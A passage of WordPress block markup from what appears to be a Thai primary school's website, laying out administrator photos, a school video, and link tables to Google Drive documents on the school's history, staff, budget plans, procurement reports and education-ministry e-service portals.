class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a 